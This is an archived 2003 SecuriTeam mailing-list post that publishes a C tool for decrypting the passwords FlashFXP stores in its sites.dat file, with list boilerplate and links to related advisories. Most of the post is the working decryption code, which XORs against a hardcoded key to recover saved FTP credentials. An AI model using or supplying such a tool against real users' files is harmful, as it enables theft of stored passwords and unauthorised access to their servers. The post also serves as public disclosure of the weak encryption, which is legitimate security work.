[TOOL] FlashFXP sites.dat Decryption
From: SecuriTeam (support_at_securiteam.com)
Date: 05/05/03
- Previous message: SecuriTeam: "[TOOL] High-speed Brute-force Password Cracker for MySQL"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 5 May 2003 17:57:58 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
FlashFXP sites.dat Decryption
------------------------------------------------------------------------
DETAILS
The following tool is able to defeat FlashFXP's sites.data encryption
algorithm, allowing local users to retrieve the passwords stored in the
file.
/* Flashfxp sites.dat decryption
* By: Dvdman@l33tsecurity.com
* L33tsecurity 2003
*/
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#define VERSION 1
char magic[] ={ 0x79,0x41,0x33, 0x36, 0x7A, 0x41, 0x34 ,0x38, 0x64, 0x45
,0x68, 0x66, 0x72, 0x76, 0x67 ,0x68,
0x47, 0x52, 0x67, 0x35, 0x37, 0x68, 0x35, 0x55, 0x6C ,0x44 ,0x76, 0x33
,0x00 ,0x00 ,0x00, 0x00, };
char b[]={ 0x36,0xd8,0x7f,0xc2,0x07,0x16,0xc3};
/* kernel */
//char b[]={ 0x74, 0x92, 0x43 ,0x9C, 0x25, 0xEE ,0x27, 0xA1, 0x2D, 0xC2,
0x77, 0x84,};
int main(int argc, char **argv)
{
unsigned char temp;
unsigned char out[128];
int i;
temp = b[0];
for (i = 1; i < sizeof(b); i++)
{
out[i - 1] = (b[i] ^ magic[i - 1]) - temp - (i + 1) % 2;
temp = b[i % 29];
};
out[i - 1] = 0;
printf("DECRYPTED PASSWORD IS: %s\n",(char *)&out);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:Dvdman@l33tsecurity.com>
Dvdman.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] High-speed Brute-force Password Cracker for MySQL"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] PHP-Nuke-Add-on Allows Viewing of Arbitrary Files (HTMLToNuke)
... The following security advisory is sent to the securiteam mailing list, and can be found at
the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin
is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [EXPL] Stealing Hotmail.com Cookie and User Login
... The following security advisory is sent to the securiteam mailing list, and can be found at
the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin
is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [NEWS] W3C HTML Validator XSS Hole
... The following security advisory is sent to the securiteam mailing list, and can be found at
the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin
is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [TOOL] Injectso, Shared Library Injector
... The following security advisory is sent to the securiteam mailing list, and can be found at
the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin
is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [UNIX] Buffer Overflow in PostgreSQL (cash_words)
... The following security advisory is sent to the securiteam mailing list, and can be found at
the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin
is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam)